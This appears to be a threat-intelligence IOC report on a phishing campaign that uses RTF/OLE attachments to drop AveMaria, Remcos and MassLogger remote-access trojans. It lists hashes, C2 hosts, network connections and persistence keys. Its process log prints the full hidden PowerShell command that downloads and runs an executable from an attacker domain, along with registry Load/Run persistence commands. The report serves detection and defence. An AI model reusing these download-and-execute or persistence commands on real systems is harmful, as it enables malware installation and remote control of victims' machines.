- #IOC #OptiData #VR #avemaria #remcos #RTF #OLE #powershell
- https://pastebin.com/ZYZarB9L
- previous_contact:
- avemaria
- 20/07/20 https://pastebin.com/LV9NKUiy
- 17/02/20 https://pastebin.com/DCPutqaR
- remcos
- 15/07/19 https://pastebin.com/ZxG6eRWM
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
- attack_vector
- --------------
- email > attach .doc (RTF) > OLE > powershell > GET1 exe > %appdata%\svchost.exe > GET2 exe > %appdata%\FIemEnwKf.exe > exfil 37.0.11.114
- email_headers
- --------------
- Received: from gmail.com (unknown [37.0.8.157])
- From: Manager <mitul1.timurnetwork@gmail.com>
- To: user00@victim77.org
- Subject: URGENT: SUPPLY COMPLAIN / DAMAGES
- Date: 12 Jul 2021 02:47:46 -0700
- MIME-Version: 1.0
- files
- --------------
- [RTF1]
- *******
- SHA-256 0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85
- File name Picture1.doc [ Rich Text Format ]
- File size 662.29 KB (678183 bytes)
- SHA-256 538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a
- File name svchost.exe [ .NET executable ] - AveMariaRAT
- File size 465.50 KB (476672 bytes)
- SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
- File name explorer.exe [ Microsoft Visual C++ ]
- File size 92.00 KB (94208 bytes) - Remcos RAT
- [RTF2]
- *******
- SHA-256 68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95
- File name Picture2.doc [ Rich Text Format ]
- File size 662.30 KB (678199 bytes)
- SHA-256 b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823
- File name powerpoint.exe [ .NET executable ] - masslogger
- File size 582.50 KB (596480 bytes)
- SHA-256 04cde0c2284cc4dc8f8a5aeadafca6819ab9d11dfb76fb7f3a2fbbf91d3c0e5d
- File name svchost.exe [ .NET executable ]
- File size 684.00 KB (700416 bytes)
- SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
- File name AFdCieIpH.exe [ Microsoft Visual C++ ]
- File size 92.00 KB (94208 bytes) - Remcos RAT
- activity
- **************
- PL_SCR httP://kqz.ugo.si/svchost.exe [RTF1]
- httP://kqz.ugo.si/powerpoint.exe [RTF2]
- C2 byx.z86.ru 37.0.11.114
- hgoz.12v.si 37.0.11.114
- netwrk
- --------------
- [RTF1]
- *******
- 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1 Mozilla/4.0
- 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1
- [RTF2]
- *******
- 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1 Mozilla/4.0
- 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1
- 37.0.11.114 hgoz.12v.si GET /rem.exe HTTP/1.1 Mozilla/4.0
- comp
- --------------
- [RTF1]
- *******
- WINWORD.EXE 3328 TCP 37.0.11.114 80 ESTABLISHED
- powershell.exe 3828 TCP 37.0.11.114 80 ESTABLISHED
- svchost.exe 1404 TCP 37.0.11.114 5200 ESTABLISHED
- svchost.exe 1404 TCP 37.0.11.114 80 ESTABLISHED
- explorer.exe 2080 TCP 37.0.11.114 2404 ESTABLISHED
- [RTF2]
- *******
- WINWORD.EXE 3836 TCP 37.0.11.114 80 ESTABLISHED
- explorer.exe 3152 TCP 37.0.11.114 2404 ESTABLISHED
- svchost.exe 816 TCP 37.0.11.114 5200 ESTABLISHED
- svchost.exe 816 TCP 37.0.11.114 80 ESTABLISHED
- proc
- --------------
- [RTF1]
- *******
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\tmp\svchost.exe
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\tmp\svchost.exe
- C:\tmp\svchost.exe
- C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Windows\SysWOW64\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\tmp\svchost.exe
- C:\Windows\SysWOW64\cmd.exe
- C:\Users\operator\AppData\Roaming\FIemEnwKf.exe
- C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
- C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
- C:\Users\operator\AppData\Roaming\windows\explorer.exe
- [RTF2]
- *******
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/powerpoint.exe','C:\Users\operator\AppData\Roaming\powerpoint.exe');Start-Process 'C:\Users\operator\AppData\Roaming\powerpoint.exe'"
- C:\Users\operator\AppData\Roaming\powerpoint.exe
- C:\tmp\powerpoint.exe
- C:\tmp\powerpoint.exe
- C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Users\operator\AppData\Roaming\svchost.exe
- C:\tmp\svchost.exe
- C:\tmp\svchost.exe
- C:\Windows\SysWOW64\cmd.exe
- C:\Users\operator\AppData\Roaming\AFdCieIpH.exe
- C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
- C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
- C:\Users\operator\AppData\Roaming\windows\explorer.exe
- persist
- --------------
- [RTF1]
- *******
- HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 13.07.2021 10:39
- C:\Users\operator\AppData\Roaming\svchost.exe Firefox Mozilla c:\users\operator\appdata\roaming\svchost.exe 13.07.2021 0:03
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:40
- pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
- [RTF2]
- *******
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:37
- pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
- drop
- --------------
- [RTF1]
- *******
- %appdata%\svchost.exe
- %tmp%\svchost.exe
- %appdata%\FIemEnwKf.exe
- %appdata%\windows\explorer.exe
- [RTF2]
- *******
- %appdata%\powerpoint.exe
- %tmp%\powerpoint.exe
- %tmp%\svchost.exe
- %appdata%\AFdCieIpH.exe
- %appdata%\windows\explorer.exe
- # # #
- VT details
- RTF1
- *******
- https://www.virustotal.com/gui/file/0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85/details
- https://www.virustotal.com/gui/file/538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a/details
- https://www.unpac.me/results/b9e19690-4c56-4150-965d-8463b8505682
- https://analyze.intezer.com/analyses/9ef6d317-1ffe-4698-9a0e-9a96e1b7c0dd
- https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
- https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
- RTF2
- *******
- https://www.virustotal.com/gui/file/68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95/details
- https://www.virustotal.com/gui/file/b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823/details
- https://www.unpac.me/results/a2582bf5-9003-4650-bcbc-135f13d6c47c
- https://analyze.intezer.com/analyses/38ba4b0f-e0d8-4791-8fdb-59d31fca75c2
- https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
- https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
- VR